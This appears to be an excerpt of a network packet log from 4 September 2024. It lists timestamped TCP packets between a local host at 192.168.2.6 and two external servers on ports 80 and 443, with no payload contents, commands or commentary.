Sep 4, 2024 17:37:09.355612040 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.356107950 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.356122017 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.356127024 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.356133938 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.356143951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.356152058 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.356156111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.356167078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.356174946 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.356179953 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.356184006 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.356185913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.356192112 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.356201887 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.356220007 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.356235027 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.356661081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.356672049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.356684923 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.356694937 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.356703043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.356703997 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.356713057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.356724977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.356724977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.356733084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.356760025 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.356794119 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.356812000 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.356842041 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.356848001 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.356859922 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.356879950 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.357243061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.357254028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.357261896 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.357270956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.357280016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.357290983 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.357294083 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.357306004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.357309103 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.357323885 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.357331038 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.357812881 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.357853889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.357877016 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.357886076 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.358092070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.358102083 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.358108997 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.358119011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.358129025 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.358133078 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.358138084 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.358138084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.358150005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.358170033 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.358171940 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.358177900 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.358194113 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.358198881 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.358220100 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.360007048 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.360023975 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.360075951 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.360081911 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.360117912 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.360373020 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.360388041 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.360429049 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.360435963 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.360470057 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.361048937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.361094952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.361154079 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.361164093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.361171961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.361196041 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.361217976 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.361289024 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.361299992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.361310959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.361319065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.361324072 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.361346006 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.361779928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.361823082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.361835003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.361845970 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.361876965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.361876965 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.361912966 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.361987114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.361998081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362006903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362016916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362025023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362035036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362041950 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362046003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362056017 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362056017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362066984 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362076998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362088919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362090111 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362118959 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362160921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362171888 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362180948 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362190008 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362199068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362200975 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362207890 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362235069 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362274885 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362286091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362294912 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362313986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362320900 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362341881 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362351894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362360001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362369061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362375975 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362390041 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362400055 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362407923 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362411022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362421989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362435102 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362443924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362464905 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362510920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362521887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362530947 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362545013 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362560987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362566948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362574100 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362582922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362598896 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362608910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362613916 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.362899065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.362941027 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363002062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363051891 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363074064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363118887 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363181114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363223076 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363234043 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363245964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363270998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363270998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363295078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363311052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363318920 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363329887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363334894 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363349915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363353968 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363360882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363375902 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363394976 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363533020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363543987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363558054 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363568068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363573074 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363579988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363589048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363595009 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363606930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363616943 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363641024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363672972 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363682032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363692045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363713026 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363713026 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363720894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363733053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363738060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363744020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363754988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363760948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363764048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363775015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363785982 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363799095 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363816977 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363853931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363863945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363873005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363883018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363890886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363890886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363898039 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363900900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363912106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.363917112 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363938093 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.363953114 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364048958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364059925 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364074945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364084959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364090919 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364090919 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364095926 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364106894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364109993 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364118099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364121914 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364126921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364134073 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364136934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364146948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364150047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364176989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364187956 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364387989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364398956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364408016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364417076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364418983 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364432096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364439964 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364448071 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364456892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364459991 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364465952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364475965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364486933 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364492893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364495039 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364504099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364506006 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364516020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364528894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364531040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364538908 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364558935 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364721060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364731073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364738941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364746094 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364746094 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364779949 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364797115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364808083 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364818096 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364826918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.364826918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364850998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.364861965 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.365017891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.365030050 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.365039110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.365062952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.365076065 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.365112066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.365123987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.365133047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.365143061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.365150928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.365151882 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.365171909 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.365180016 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.440676928 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.440726995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.440737963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.440753937 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.440769911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.440781116 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.440781116 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.440784931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.440795898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.440800905 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.440807104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.440817118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.440818071 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.440831900 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.440843105 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.440860987 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.441242933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.441253901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.441262960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.441272020 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.441281080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.441288948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.441288948 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.441302061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.441308022 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.441312075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.441329002 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.441329002 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.441339016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.441348076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.441356897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.441364050 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.441365957 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.441378117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.441394091 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.441416025 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.456427097 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.456463099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.456475019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.456482887 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.456496954 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.456516027 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.456530094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.456541061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.456557035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.456563950 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.456568003 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.456578016 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.456592083 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.456604958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.456722975 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.456734896 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.456743956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.456753969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.456759930 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.456763983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.456773996 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.456774950 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.456787109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.456796885 CEST	80	49717	147.45.44.104	192.168.2.6
